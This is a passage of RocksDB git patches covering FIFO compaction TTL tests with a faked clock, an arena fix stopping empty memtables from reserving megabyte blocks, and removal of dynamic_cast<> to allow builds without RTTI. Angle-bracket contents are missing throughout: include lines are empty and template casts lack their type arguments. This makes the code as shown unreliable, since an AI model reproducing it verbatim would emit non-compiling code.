+ virtual bool ExtractExpiration(const Slice& key, const Slice& value, + uint64_t now, uint64_t* expiration, + std::string* new_value, bool* value_changed); + + virtual ~TTLExtractor() = default; +}; + } // namespace blob_db } // namespace rocksdb #endif // ROCKSDB_LITE diff --git a/utilities/blob_db/ttl_extractor.cc b/utilities/blob_db/ttl_extractor.cc index 735b2f30fb7..267f904b675 100644 --- a/utilities/blob_db/ttl_extractor.cc +++ b/utilities/blob_db/ttl_extractor.cc @@ -2,8 +2,9 @@ // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). -#include "ttl_extractor.h" +#ifndef ROCKSDB_LITE +#include "utilities/blob_db/blob_db.h" #include "util/coding.h" namespace rocksdb { @@ -29,3 +30,5 @@ bool TTLExtractor::ExtractExpiration(const Slice& key, const Slice& value, } // namespace blob_db } // namespace rocksdb + +#endif // ROCKSDB_LITE diff --git a/utilities/blob_db/ttl_extractor.h b/utilities/blob_db/ttl_extractor.h deleted file mode 100644 index 51df944511e..00000000000 --- a/utilities/blob_db/ttl_extractor.h +++ /dev/null @@ -1,43 +0,0 @@ -// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under both the GPLv2 (found in the -// COPYING file in the root directory) and Apache 2.0 License -// (found in the LICENSE.Apache file in the root directory). -#pragma once - -#include -#include - -#include "rocksdb/slice.h" - -namespace rocksdb { -namespace blob_db { - -// TTLExtractor allow applications to extract TTL from key-value pairs. -// This useful for applications using Put or WriteBatch to write keys and -// don't intend to migrate to PutWithTTL or PutUntil. -// -// Applications can implement either ExtractTTL or ExtractExpiration. If both -// are implemented, ExtractExpiration will take precedence. -class TTLExtractor { - public: - // Extract TTL from key-value pair. - // Return true if the key has TTL, false otherwise. If key has TTL, - // TTL is pass back through ttl. The method can optionally modify the value, - // pass the result back through new_value, and also set value_changed to true. - virtual bool ExtractTTL(const Slice& key, const Slice& value, uint64_t* ttl, - std::string* new_value, bool* value_changed); - - // Extract expiration time from key-value pair. - // Return true if the key has expiration time, false otherwise. If key has - // expiration time, it is pass back through expiration. The method can - // optionally modify the value, pass the result back through new_value, - // and also set value_changed to true. - virtual bool ExtractExpiration(const Slice& key, const Slice& value, - uint64_t now, uint64_t* expiration, - std::string* new_value, bool* value_changed); - - virtual ~TTLExtractor() = default; -}; - -} // namespace blob_db -} // namespace rocksdb From ac748c57ed72e021cfc7c24b4920737a1973ca97 Mon Sep 17 00:00:00 2001 From: Sagar Vemuri Date: Fri, 28 Jul 2017 14:28:09 -0700 Subject: [PATCH 060/205] Fix FIFO Compaction with TTL tests Summary: - FIFOCompactionWithTTLTest was flaky when run in parallel earlier, and hence it was disabled. Fixed it now. - Also, faking sleep now instead of really sleeping to make tests more realistic by using TTLs like 1 hour and 1 day. 
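The fake-sleep pattern the summary refers to can be sketched as an Env wrapper whose clock is advanced explicitly. This is an illustrative reconstruction, not the patch's code; the tests themselves use the addon_time_ member of db_test's SpecialEnv, as the diff below shows.
```cpp
// Sketch of a fake clock: instead of blocking for two hours, the test
// advances an offset that is added to the wrapped Env's NowMicros().
#include <atomic>
#include "rocksdb/env.h"

class FakeSleepEnv : public rocksdb::EnvWrapper {
 public:
  explicit FakeSleepEnv(rocksdb::Env* base) : rocksdb::EnvWrapper(base) {}

  uint64_t NowMicros() override {
    return target()->NowMicros() + addon_micros_.load();
  }

  // "Sleep" without blocking: jump the clock forward.
  void FakeSleepForSeconds(uint64_t secs) {
    addon_micros_.fetch_add(secs * 1000000);
  }

 private:
  std::atomic<uint64_t> addon_micros_{0};
};
```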
Closes https://github.com/facebook/rocksdb/pull/2650 Differential Revision: D5506038 Pulled By: sagar0 fbshipit-source-id: deb429a527f045e3e2c5138b547c3e8ac8586aa2 --- db/db_test.cc | 60 ++++++++++++++++++++++++++++++--------------------- 1 file changed, 35 insertions(+), 25 deletions(-) diff --git a/db/db_test.cc b/db/db_test.cc index e9840faa042..8d637e579fb 100644 --- a/db/db_test.cc +++ b/db/db_test.cc @@ -2847,20 +2847,23 @@ TEST_F(DBTest, FIFOCompactionWithTTLAndVariousTableFormatsTest) { ASSERT_TRUE(TryReopen(options).IsNotSupported()); } -TEST_F(DBTest, DISABLED_FIFOCompactionWithTTLTest) { +TEST_F(DBTest, FIFOCompactionWithTTLTest) { Options options; options.compaction_style = kCompactionStyleFIFO; options.write_buffer_size = 10 << 10; // 10KB options.arena_block_size = 4096; options.compression = kNoCompression; options.create_if_missing = true; + env_->time_elapse_only_sleep_ = false; + options.env = env_; // Test to make sure that all files with expired ttl are deleted on next // manual compaction. { + env_->addon_time_.store(0); options.compaction_options_fifo.max_table_files_size = 150 << 10; // 150KB options.compaction_options_fifo.allow_compaction = false; - options.compaction_options_fifo.ttl = 600; // seconds + options.compaction_options_fifo.ttl = 1 * 60 * 60 ; // 1 hour options = CurrentOptions(options); DestroyAndReopen(options); @@ -2871,19 +2874,21 @@ TEST_F(DBTest, DISABLED_FIFOCompactionWithTTLTest) { ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980))); } Flush(); + ASSERT_OK(dbfull()->TEST_WaitForCompact()); } - ASSERT_OK(dbfull()->TEST_WaitForCompact()); ASSERT_EQ(NumTableFilesAtLevel(0), 10); - // sleep for 5 seconds - env_->SleepForMicroseconds(5 * 1000 * 1000); + // Sleep for 2 hours -- which is much greater than TTL. + // Note: Couldn't use SleepForMicroseconds because it takes an int instead + // of uint64_t. Hence used addon_time_ directly. + // env_->SleepForMicroseconds(2 * 60 * 60 * 1000 * 1000); + env_->addon_time_.fetch_add(2 * 60 * 60); + + // Since no flushes and compactions have run, the db should still be in + // the same state even after considerable time has passed. ASSERT_OK(dbfull()->TEST_WaitForCompact()); ASSERT_EQ(NumTableFilesAtLevel(0), 10); - // change ttl to 1 sec. So all files should be deleted on next compaction. - options.compaction_options_fifo.ttl = 1; - Reopen(options); - dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr); ASSERT_EQ(NumTableFilesAtLevel(0), 0); } @@ -2893,7 +2898,7 @@ TEST_F(DBTest, DISABLED_FIFOCompactionWithTTLTest) { { options.compaction_options_fifo.max_table_files_size = 150 << 10; // 150KB options.compaction_options_fifo.allow_compaction = false; - options.compaction_options_fifo.ttl = 5; // seconds + options.compaction_options_fifo.ttl = 1 * 60 * 60; // 1 hour options = CurrentOptions(options); DestroyAndReopen(options); @@ -2904,11 +2909,13 @@ TEST_F(DBTest, DISABLED_FIFOCompactionWithTTLTest) { ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980))); } Flush(); + ASSERT_OK(dbfull()->TEST_WaitForCompact()); } - ASSERT_OK(dbfull()->TEST_WaitForCompact()); ASSERT_EQ(NumTableFilesAtLevel(0), 10); - env_->SleepForMicroseconds(6 * 1000 * 1000); + // Sleep for 2 hours -- which is much greater than TTL. + env_->addon_time_.fetch_add(2 * 60 * 60); + // Just to make sure that we are in the same state even after sleeping. 
ASSERT_OK(dbfull()->TEST_WaitForCompact()); ASSERT_EQ(NumTableFilesAtLevel(0), 10); @@ -2930,10 +2937,10 @@ TEST_F(DBTest, DISABLED_FIFOCompactionWithTTLTest) { // Test that shows the fall back to size-based FIFO compaction if TTL-based // deletion doesn't move the total size to be less than max_table_files_size. { - options.write_buffer_size = 110 << 10; // 10KB + options.write_buffer_size = 10 << 10; // 10KB options.compaction_options_fifo.max_table_files_size = 150 << 10; // 150KB options.compaction_options_fifo.allow_compaction = false; - options.compaction_options_fifo.ttl = 5; // seconds + options.compaction_options_fifo.ttl = 1 * 60 * 60; // 1 hour options = CurrentOptions(options); DestroyAndReopen(options); @@ -2944,11 +2951,13 @@ TEST_F(DBTest, DISABLED_FIFOCompactionWithTTLTest) { ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980))); } Flush(); + ASSERT_OK(dbfull()->TEST_WaitForCompact()); } - ASSERT_OK(dbfull()->TEST_WaitForCompact()); ASSERT_EQ(NumTableFilesAtLevel(0), 3); - env_->SleepForMicroseconds(6 * 1000 * 1000); + // Sleep for 2 hours -- which is much greater than TTL. + env_->addon_time_.fetch_add(2 * 60 * 60); + // Just to make sure that we are in the same state even after sleeping. ASSERT_OK(dbfull()->TEST_WaitForCompact()); ASSERT_EQ(NumTableFilesAtLevel(0), 3); @@ -2957,8 +2966,8 @@ TEST_F(DBTest, DISABLED_FIFOCompactionWithTTLTest) { ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980))); } Flush(); + ASSERT_OK(dbfull()->TEST_WaitForCompact()); } - ASSERT_OK(dbfull()->TEST_WaitForCompact()); // Size limit is still guaranteed. ASSERT_LE(SizeAtLevel(0), options.compaction_options_fifo.max_table_files_size); @@ -2968,7 +2977,7 @@ TEST_F(DBTest, DISABLED_FIFOCompactionWithTTLTest) { { options.compaction_options_fifo.max_table_files_size = 150 << 10; // 150KB options.compaction_options_fifo.allow_compaction = true; - options.compaction_options_fifo.ttl = 5; // seconds + options.compaction_options_fifo.ttl = 1 * 60 * 60; // 1 hour options.level0_file_num_compaction_trigger = 6; options = CurrentOptions(options); DestroyAndReopen(options); @@ -2980,15 +2989,16 @@ TEST_F(DBTest, DISABLED_FIFOCompactionWithTTLTest) { ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980))); } Flush(); + ASSERT_OK(dbfull()->TEST_WaitForCompact()); } // With Intra-L0 compaction, out of 10 files, 6 files will be compacted to 1 // (due to level0_file_num_compaction_trigger = 6). // So total files = 1 + remaining 4 = 5. - ASSERT_OK(dbfull()->TEST_WaitForCompact()); ASSERT_EQ(NumTableFilesAtLevel(0), 5); - // Sleep for a little over ttl time. - env_->SleepForMicroseconds(6 * 1000 * 1000); + // Sleep for 2 hours -- which is much greater than TTL. + env_->addon_time_.fetch_add(2 * 60 * 60); + // Just to make sure that we are in the same state even after sleeping. 
ASSERT_OK(dbfull()->TEST_WaitForCompact()); ASSERT_EQ(NumTableFilesAtLevel(0), 5); @@ -2998,8 +3008,8 @@ TEST_F(DBTest, DISABLED_FIFOCompactionWithTTLTest) { ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980))); } Flush(); + ASSERT_OK(dbfull()->TEST_WaitForCompact()); } - ASSERT_OK(dbfull()->TEST_WaitForCompact()); ASSERT_EQ(NumTableFilesAtLevel(0), 5); ASSERT_LE(SizeAtLevel(0), options.compaction_options_fifo.max_table_files_size); @@ -3011,7 +3021,7 @@ TEST_F(DBTest, DISABLED_FIFOCompactionWithTTLTest) { options.write_buffer_size = 20 << 10; // 20K options.compaction_options_fifo.max_table_files_size = 1500 << 10; // 1.5MB options.compaction_options_fifo.allow_compaction = true; - options.compaction_options_fifo.ttl = 60 * 60; // 1 hour + options.compaction_options_fifo.ttl = 1 * 60 * 60; // 1 hour options.level0_file_num_compaction_trigger = 6; options = CurrentOptions(options); DestroyAndReopen(options); @@ -3023,8 +3033,8 @@ TEST_F(DBTest, DISABLED_FIFOCompactionWithTTLTest) { ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980))); } Flush(); + ASSERT_OK(dbfull()->TEST_WaitForCompact()); } - ASSERT_OK(dbfull()->TEST_WaitForCompact()); // It should be compacted to 10 files. ASSERT_EQ(NumTableFilesAtLevel(0), 10); @@ -3034,8 +3044,8 @@ TEST_F(DBTest, DISABLED_FIFOCompactionWithTTLTest) { ASSERT_OK(Put(ToString(i * 20 + j + 2000), RandomString(&rnd, 980))); } Flush(); + ASSERT_OK(dbfull()->TEST_WaitForCompact()); } - ASSERT_OK(dbfull()->TEST_WaitForCompact()); // It should be compacted to no more than 20 files. ASSERT_GT(NumTableFilesAtLevel(0), 10); From e85f2c64cb231150fead77846f4ec3bb22b1dd8a Mon Sep 17 00:00:00 2001 From: Mike Kolupaev Date: Fri, 28 Jul 2017 15:43:50 -0700 Subject: [PATCH 061/205] Prevent empty memtables from using a lot of memory Summary: This fixes OOMs that we (logdevice) are currently having in production. SkipListRep constructor does a couple of small allocations from ConcurrentArena (see InlineSkipList constructor). ConcurrentArena would sometimes allocate an entire block for that, which is a few megabytes (we use Options::arena_block_size = 4 MB). So an empty memtable can take 4 MB of memory. We have ~40k column families (spread across 15 DB instances), so 4 MB per empty memtable easily OOMs a machine for us. This PR makes ConcurrentArena always allocate from Arena's inline block when possible. So as long as InlineSkipList's initial allocations are below 2 KB, there would be no blocks allocated for empty memtables.
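Before the diff, here is a minimal, self-contained sketch of the allocation policy the summary describes: serve the first small requests from a fixed inline buffer, and only fall back to heap-allocated blocks once it is exhausted. ToyArena, its kInlineSize, and main() are invented for illustration and are not RocksDB APIs; the real change is the IsInInlineBlock() fast path in util/arena.h and util/concurrent_arena.h shown below.

#include <cstddef>
#include <cstdio>
#include <memory>
#include <vector>

class ToyArena {
 public:
  static constexpr size_t kInlineSize = 2048;

  char* Allocate(size_t bytes) {
    // Fast path: carve small requests out of the fixed inline buffer, so
    // creating the arena's owner (e.g. an empty memtable) allocates nothing.
    if (IsInInlineBlock() && inline_used_ + bytes <= kInlineSize) {
      char* result = inline_block_ + inline_used_;
      inline_used_ += bytes;
      return result;
    }
    // Slow path: a dedicated heap block, which in the OOM scenario above
    // would be a full arena_block_size (4 MB) block.
    blocks_.emplace_back(new char[bytes]);
    return blocks_.back().get();
  }

  // Same contract as the Arena::IsInInlineBlock() added by this patch:
  // true as long as no separate block has been allocated yet.
  bool IsInInlineBlock() const { return blocks_.empty(); }

 private:
  char inline_block_[kInlineSize];
  size_t inline_used_ = 0;
  std::vector<std::unique_ptr<char[]>> blocks_;
};

int main() {
  ToyArena arena;
  arena.Allocate(1024);  // skiplist-construction-sized allocation
  std::printf("inline after 1 KB: %d\n", arena.IsInInlineBlock());  // 1
  arena.Allocate(4096);  // a larger request finally spills to a heap block
  std::printf("inline after 4 KB: %d\n", arena.IsInInlineBlock());  // 0
  return 0;
}

The actual patch keeps ConcurrentArena's sharded fast path and only adds an "allocate from arena_ directly while it is still in its inline block" branch, as the util/concurrent_arena.h hunk below shows.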
Closes https://github.com/facebook/rocksdb/pull/2569 Differential Revision: D5404029 Pulled By: al13n321 fbshipit-source-id: 568ec22a3fd1a485c06123f6b2dfc5e9ef67cd23 --- util/arena.h | 4 ++++ util/arena_test.cc | 6 ++++++ util/concurrent_arena.h | 15 +++++++++++++++ 3 files changed, 25 insertions(+) diff --git a/util/arena.h b/util/arena.h index a2093517162..af53a2ff81b 100644 --- a/util/arena.h +++ b/util/arena.h @@ -77,6 +77,10 @@ class Arena : public Allocator { size_t BlockSize() const override { return kBlockSize; } + bool IsInInlineBlock() const { + return blocks_.empty(); + } + private: char inline_block_[kInlineSize] __attribute__((__aligned__(sizeof(void*)))); // Number of bytes allocated in one block diff --git a/util/arena_test.cc b/util/arena_test.cc index a033765adcb..53777a20b6b 100644 --- a/util/arena_test.cc +++ b/util/arena_test.cc @@ -91,9 +91,13 @@ static void ApproximateMemoryUsageTest(size_t huge_page_size) { ASSERT_EQ(kZero, arena.ApproximateMemoryUsage()); // allocate inline bytes + EXPECT_TRUE(arena.IsInInlineBlock()); arena.AllocateAligned(8); + EXPECT_TRUE(arena.IsInInlineBlock()); arena.AllocateAligned(Arena::kInlineSize / 2 - 16); + EXPECT_TRUE(arena.IsInInlineBlock()); arena.AllocateAligned(Arena::kInlineSize / 2); + EXPECT_TRUE(arena.IsInInlineBlock()); ASSERT_EQ(arena.ApproximateMemoryUsage(), Arena::kInlineSize - 8); ASSERT_PRED2(CheckMemoryAllocated, arena.MemoryAllocatedBytes(), Arena::kInlineSize); @@ -102,6 +106,7 @@ static void ApproximateMemoryUsageTest(size_t huge_page_size) { // first allocation arena.AllocateAligned(kEntrySize); + EXPECT_FALSE(arena.IsInInlineBlock()); auto mem_usage = arena.MemoryAllocatedBytes(); if (huge_page_size) { ASSERT_TRUE( @@ -117,6 +122,7 @@ static void ApproximateMemoryUsageTest(size_t huge_page_size) { arena.AllocateAligned(kEntrySize); ASSERT_EQ(mem_usage, arena.MemoryAllocatedBytes()); ASSERT_EQ(arena.ApproximateMemoryUsage(), usage + kEntrySize); + EXPECT_FALSE(arena.IsInInlineBlock()); usage = arena.ApproximateMemoryUsage(); } if (huge_page_size) { diff --git a/util/concurrent_arena.h b/util/concurrent_arena.h index a79fb95fe2d..1ab88c7ff1a 100644 --- a/util/concurrent_arena.h +++ b/util/concurrent_arena.h @@ -164,6 +164,21 @@ class ConcurrentArena : public Allocator { // size, we adjust our request to avoid arena waste. auto exact = arena_allocated_and_unused_.load(std::memory_order_relaxed); assert(exact == arena_.AllocatedAndUnused()); + + if (exact >= bytes && arena_.IsInInlineBlock()) { + // If we haven't exhausted arena's inline block yet, allocate from arena + // directly. This ensures that we'll do the first few small allocations + // without allocating any blocks. + // In particular this prevents empty memtables from using a + // disproportionately large amount of memory: a memtable allocates on + // the order of 1 KB of memory when created; we wouldn't want to + // allocate a full arena block (typically a few megabytes) for that, + // especially if there are thousands of empty memtables. + auto rv = func(); + Fixup(); + return rv; + } + avail = exact >= shard_block_size_ / 2 && exact < shard_block_size_ * 2 ? exact : shard_block_size_; From 21696ba502d7b2191d6e9c984536f3cc1fc452dd Mon Sep 17 00:00:00 2001 From: Siying Dong Date: Fri, 28 Jul 2017 16:23:50 -0700 Subject: [PATCH 062/205] Replace dynamic_cast<> Summary: Replace dynamic_cast<> so that users can choose to build with RTTI off, so that they can save several bytes per object and get a little more memory available. Some nontrivial changes: 1.
Add Comparator::GetRootComparator() to get around the internal comparator hack 2. Add the two experimental functions to DB 3. Add TableFactory::GetOptionString() to avoid unnecessary casting to get the option string 4. Since 3 is done, move the parsing option functions for table factory to table factory files too, to be symmetric. Closes https://github.com/facebook/rocksdb/pull/2645 Differential Revision: D5502723 Pulled By: siying fbshipit-source-id: fd13cec5601cf68a554d87bfcf056f2ffa5fbf7c --- HISTORY.md | 1 + Makefile | 12 + cache/clock_cache.cc | 5 + db/convenience.cc | 6 +- db/db_impl.h | 6 +- db/dbformat.h | 3 + db/experimental.cc | 12 +- db/wal_manager.cc | 5 +- env/mock_env.cc | 4 +- examples/Makefile | 4 + examples/compaction_filter_example.cc | 6 +- include/rocksdb/comparator.h | 4 + include/rocksdb/db.h | 11 + include/rocksdb/table.h | 6 + include/rocksdb/utilities/stackable_db.h | 11 + monitoring/histogram.cc | 4 +- monitoring/histogram_windowing.cc | 5 +- options/options_helper.cc | 315 +----------------- options/options_helper.h | 112 +------ options/options_parser.cc | 59 +--- options/options_parser.h | 10 +- options/options_test.cc | 24 +- table/block_based_table_factory.cc | 193 ++++++++++- table/block_based_table_factory.h | 94 +++++- table/cuckoo_table_factory.h | 5 + table/plain_table_factory.cc | 144 +++++++- table/plain_table_factory.h | 32 ++ tools/db_bench_tool.cc | 6 +- tools/ldb_cmd.cc | 7 +- tools/sst_dump_tool.cc | 12 +- util/cast_util.h | 19 ++ utilities/blob_db/blob_db_impl.cc | 28 +- utilities/column_aware_encoding_util.cc | 4 +- utilities/options/options_util_test.cc | 26 +- .../optimistic_transaction_impl.cc | 12 +- utilities/transactions/transaction_db_impl.cc | 11 +- utilities/transactions/transaction_impl.cc | 11 +- .../transactions/transaction_lock_mgr.cc | 6 +- 38 files changed, 684 insertions(+), 551 deletions(-) create mode 100644 util/cast_util.h diff --git a/HISTORY.md b/HISTORY.md index 9d8468c6e28..76e01f04c01 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -2,6 +2,7 @@ ## Unreleased ### New Features * Add Iterator::Refresh(), which allows users to update the iterator state so that they can avoid some initialization costs of recreating iterators. +* Replace dynamic_cast<> (except unit test) so people can choose to build with RTTI off. With make, release mode is by default built with -fno-rtti and debug mode is built without it. Users can override it by setting USE_RTTI=0 or 1. ## 5.7.0 (07/13/2017) ### Public API Change diff --git a/Makefile b/Makefile index 55f642135ed..a01c74e954e 100644 --- a/Makefile +++ b/Makefile @@ -101,7 +101,19 @@ endif ifeq ($(DEBUG_LEVEL),0) OPT += -DNDEBUG DISABLE_WARNING_AS_ERROR=1 + +ifneq ($(USE_RTTI), 1) + CXXFLAGS += -fno-rtti +else + CXXFLAGS += -DROCKSDB_USE_RTTI +endif else +ifneq ($(USE_RTTI), 0) + CXXFLAGS += -DROCKSDB_USE_RTTI +else + CXXFLAGS += -fno-rtti +endif + $(warning Warning: Compiling in debug mode. Don't use the resulting binary in production) endif diff --git a/cache/clock_cache.cc b/cache/clock_cache.cc index db9d1438e22..7e42714ef14 100644 --- a/cache/clock_cache.cc +++ b/cache/clock_cache.cc @@ -27,6 +27,11 @@ std::shared_ptr NewClockCache(size_t capacity, int num_shard_bits, #include #include +// "tbb/concurrent_hash_map.h" requires RTTI if exceptions are enabled. +// Disable it so users can choose to disable RTTI.
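+// (Note: TBB configuration macros such as TBB_USE_EXCEPTIONS only take
+// effect when defined before the TBB header is included, which is why this
+// #define must precede the #include below.)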
+#ifndef ROCKSDB_USE_RTTI +#define TBB_USE_EXCEPTIONS 0 +#endif #include "tbb/concurrent_hash_map.h" #include "cache/sharded_cache.h" diff --git a/db/convenience.cc b/db/convenience.cc index 6568b1ffff3..e3e7165b463 100644 --- a/db/convenience.cc +++ b/db/convenience.cc @@ -9,16 +9,18 @@ #include "rocksdb/convenience.h" #include "db/db_impl.h" +#include "util/cast_util.h" namespace rocksdb { void CancelAllBackgroundWork(DB* db, bool wait) { - (dynamic_cast(db->GetRootDB()))->CancelAllBackgroundWork(wait); + (static_cast_with_check(db->GetRootDB())) + ->CancelAllBackgroundWork(wait); } Status DeleteFilesInRange(DB* db, ColumnFamilyHandle* column_family, const Slice* begin, const Slice* end) { - return (dynamic_cast(db->GetRootDB())) + return (static_cast_with_check(db->GetRootDB())) ->DeleteFilesInRange(column_family, begin, end); } diff --git a/db/db_impl.h b/db/db_impl.h index 543d64ec800..7fec69cd732 100644 --- a/db/db_impl.h +++ b/db/db_impl.h @@ -235,11 +235,11 @@ class DBImpl : public DB { ColumnFamilyHandle* column_family, ColumnFamilyMetaData* metadata) override; - // experimental API Status SuggestCompactRange(ColumnFamilyHandle* column_family, - const Slice* begin, const Slice* end); + const Slice* begin, const Slice* end) override; - Status PromoteL0(ColumnFamilyHandle* column_family, int target_level); + Status PromoteL0(ColumnFamilyHandle* column_family, + int target_level) override; // Similar to Write() but will call the callback once on the single write // thread to determine whether it is safe to perform the write. diff --git a/db/dbformat.h b/db/dbformat.h index ed1861cf245..d9fd5f3997b 100644 --- a/db/dbformat.h +++ b/db/dbformat.h @@ -157,6 +157,9 @@ class InternalKeyComparator : public Comparator { int Compare(const InternalKey& a, const InternalKey& b) const; int Compare(const ParsedInternalKey& a, const ParsedInternalKey& b) const; + virtual const Comparator* GetRootComparator() const override { + return user_comparator_->GetRootComparator(); + } }; // Modules in this directory should keep internal keys wrapped inside diff --git a/db/experimental.cc b/db/experimental.cc index 45d4d70aa82..effe9d7c355 100644 --- a/db/experimental.cc +++ b/db/experimental.cc @@ -14,20 +14,18 @@ namespace experimental { Status SuggestCompactRange(DB* db, ColumnFamilyHandle* column_family, const Slice* begin, const Slice* end) { - auto dbimpl = dynamic_cast(db); - if (dbimpl == nullptr) { - return Status::InvalidArgument("Didn't recognize DB object"); + if (db == nullptr) { + return Status::InvalidArgument("DB is empty"); } - return dbimpl->SuggestCompactRange(column_family, begin, end); + return db->SuggestCompactRange(column_family, begin, end); } Status PromoteL0(DB* db, ColumnFamilyHandle* column_family, int target_level) { - auto dbimpl = dynamic_cast(db); - if (dbimpl == nullptr) { + if (db == nullptr) { return Status::InvalidArgument("Didn't recognize DB object"); } - return dbimpl->PromoteL0(column_family, target_level); + return db->PromoteL0(column_family, target_level); } #else // ROCKSDB_LITE diff --git a/db/wal_manager.cc b/db/wal_manager.cc index 7ee2dd0176e..4a9ecbfdd8e 100644 --- a/db/wal_manager.cc +++ b/db/wal_manager.cc @@ -26,6 +26,7 @@ #include "rocksdb/env.h" #include "rocksdb/options.h" #include "rocksdb/write_batch.h" +#include "util/cast_util.h" #include "util/coding.h" #include "util/file_reader_writer.h" #include "util/filename.h" @@ -273,8 +274,8 @@ namespace { struct CompareLogByPointer { bool operator()(const std::unique_ptr& a, const std::unique_ptr& b) { - 
LogFileImpl* a_impl = dynamic_cast(a.get()); - LogFileImpl* b_impl = dynamic_cast(b.get()); + LogFileImpl* a_impl = static_cast_with_check(a.get()); + LogFileImpl* b_impl = static_cast_with_check(b.get()); return *a_impl < *b_impl; } }; diff --git a/env/mock_env.cc b/env/mock_env.cc index 79a4f8c44a6..669011c4ee4 100644 --- a/env/mock_env.cc +++ b/env/mock_env.cc @@ -11,6 +11,7 @@ #include #include #include "port/sys_time.h" +#include "util/cast_util.h" #include "util/murmurhash.h" #include "util/random.h" #include "util/rate_limiter.h" @@ -711,7 +712,8 @@ Status MockEnv::LockFile(const std::string& fname, FileLock** flock) { } Status MockEnv::UnlockFile(FileLock* flock) { - std::string fn = dynamic_cast(flock)->FileName(); + std::string fn = + static_cast_with_check(flock)->FileName(); { MutexLock lock(&mutex_); if (file_map_.find(fn) != file_map_.end()) { diff --git a/examples/Makefile b/examples/Makefile index a3a786e8315..57cd1a75a1c 100644 --- a/examples/Makefile +++ b/examples/Makefile @@ -8,6 +8,10 @@ ifndef DISABLE_JEMALLOC PLATFORM_CXXFLAGS += $(JEMALLOC_INCLUDE) endif +ifneq ($(USE_RTTI), 1) + CXXFLAGS += -fno-rtti +endif + .PHONY: clean librocksdb all: simple_example column_families_example compact_files_example c_simple_example optimistic_transaction_example transaction_example compaction_filter_example options_file_example diff --git a/examples/compaction_filter_example.cc b/examples/compaction_filter_example.cc index 7a78244a0c6..226dfe7905d 100644 --- a/examples/compaction_filter_example.cc +++ b/examples/compaction_filter_example.cc @@ -59,7 +59,11 @@ int main() { MyFilter filter; - system("rm -rf /tmp/rocksmergetest"); + int ret = system("rm -rf /tmp/rocksmergetest"); + if (ret != 0) { + fprintf(stderr, "Error deleting /tmp/rocksmergetest, code: %d\n", ret); + return ret; + } rocksdb::Options options; options.create_if_missing = true; options.merge_operator.reset(new MyMerge); diff --git a/include/rocksdb/comparator.h b/include/rocksdb/comparator.h index ac6e4a9b096..64db73a7244 100644 --- a/include/rocksdb/comparator.h +++ b/include/rocksdb/comparator.h @@ -64,6 +64,10 @@ class Comparator { // Simple comparator implementations may return with *key unchanged, // i.e., an implementation of this method that does nothing is correct. virtual void FindShortSuccessor(std::string* key) const = 0; + + // If it is a wrapped comparator, this may return the root one. + // Returns itself if it is not wrapped.
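+ // (In this patch, InternalKeyComparator in db/dbformat.h overrides this
+ // to forward to the wrapped user comparator.)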
+ virtual const Comparator* GetRootComparator() const { return this; } }; // Return a builtin comparator that uses lexicographic byte-wise diff --git a/include/rocksdb/db.h b/include/rocksdb/db.h index ee5706b4c8b..692932c35de 100644 --- a/include/rocksdb/db.h +++ b/include/rocksdb/db.h @@ -1097,6 +1097,17 @@ class DB { virtual Status GetPropertiesOfTablesInRange( ColumnFamilyHandle* column_family, const Range* range, std::size_t n, TablePropertiesCollection* props) = 0; + + virtual Status SuggestCompactRange(ColumnFamilyHandle* column_family, + const Slice* begin, const Slice* end) { + return Status::NotSupported("SuggestCompactRange() is not implemented."); + } + + virtual Status PromoteL0(ColumnFamilyHandle* column_family, + int target_level) { + return Status::NotSupported("PromoteL0() is not implemented."); + } + #endif // ROCKSDB_LITE // Needed for StackableDB diff --git a/include/rocksdb/table.h b/include/rocksdb/table.h index 40e4d88b6c9..04e532e161c 100644 --- a/include/rocksdb/table.h +++ b/include/rocksdb/table.h @@ -467,6 +467,12 @@ class TableFactory { // RocksDB prints configurations at DB Open(). virtual std::string GetPrintableTableOptions() const = 0; + virtual Status GetOptionString(std::string* opt_string, + const std::string& delimiter) const { + return Status::NotSupported( + "The table factory doesn't implement GetOptionString()."); + } + // Returns the raw pointer of the table options that is used by this // TableFactory, or nullptr if this function is not supported. // Since the return value is a raw pointer, the TableFactory owns the diff --git a/include/rocksdb/utilities/stackable_db.h b/include/rocksdb/utilities/stackable_db.h index db5068b1d57..d2c0dbd7b7d 100644 --- a/include/rocksdb/utilities/stackable_db.h +++ b/include/rocksdb/utilities/stackable_db.h @@ -350,6 +350,17 @@ class StackableDB : public DB { return db_->GetUpdatesSince(seq_number, iter, read_options); } + virtual Status SuggestCompactRange(ColumnFamilyHandle* column_family, + const Slice* begin, + const Slice* end) override { + return db_->SuggestCompactRange(column_family, begin, end); + } + + virtual Status PromoteL0(ColumnFamilyHandle* column_family, + int target_level) override { + return db_->PromoteL0(column_family, target_level); + } + virtual ColumnFamilyHandle* DefaultColumnFamily() const override { return db_->DefaultColumnFamily(); } diff --git a/monitoring/histogram.cc b/monitoring/histogram.cc index 835ffc88a70..56b5a3914a1 100644 --- a/monitoring/histogram.cc +++ b/monitoring/histogram.cc @@ -19,6 +19,7 @@ #include #include "port/port.h" +#include "util/cast_util.h" namespace rocksdb { @@ -255,7 +256,8 @@ void HistogramImpl::Add(uint64_t value) { void HistogramImpl::Merge(const Histogram& other) { if (strcmp(Name(), other.Name()) == 0) { - Merge(dynamic_cast(other)); + Merge( + *static_cast_with_check(&other)); } } diff --git a/monitoring/histogram_windowing.cc b/monitoring/histogram_windowing.cc index 20ee983f145..28d8265f263 100644 --- a/monitoring/histogram_windowing.cc +++ b/monitoring/histogram_windowing.cc @@ -9,6 +9,7 @@ #include "monitoring/histogram_windowing.h" #include "monitoring/histogram.h" +#include "util/cast_util.h" #include @@ -64,7 +65,9 @@ void HistogramWindowingImpl::Add(uint64_t value){ void HistogramWindowingImpl::Merge(const Histogram& other) { if (strcmp(Name(), other.Name()) == 0) { - Merge(dynamic_cast(other)); + Merge( + *static_cast_with_check( + &other)); } } diff --git a/options/options_helper.cc b/options/options_helper.cc index 
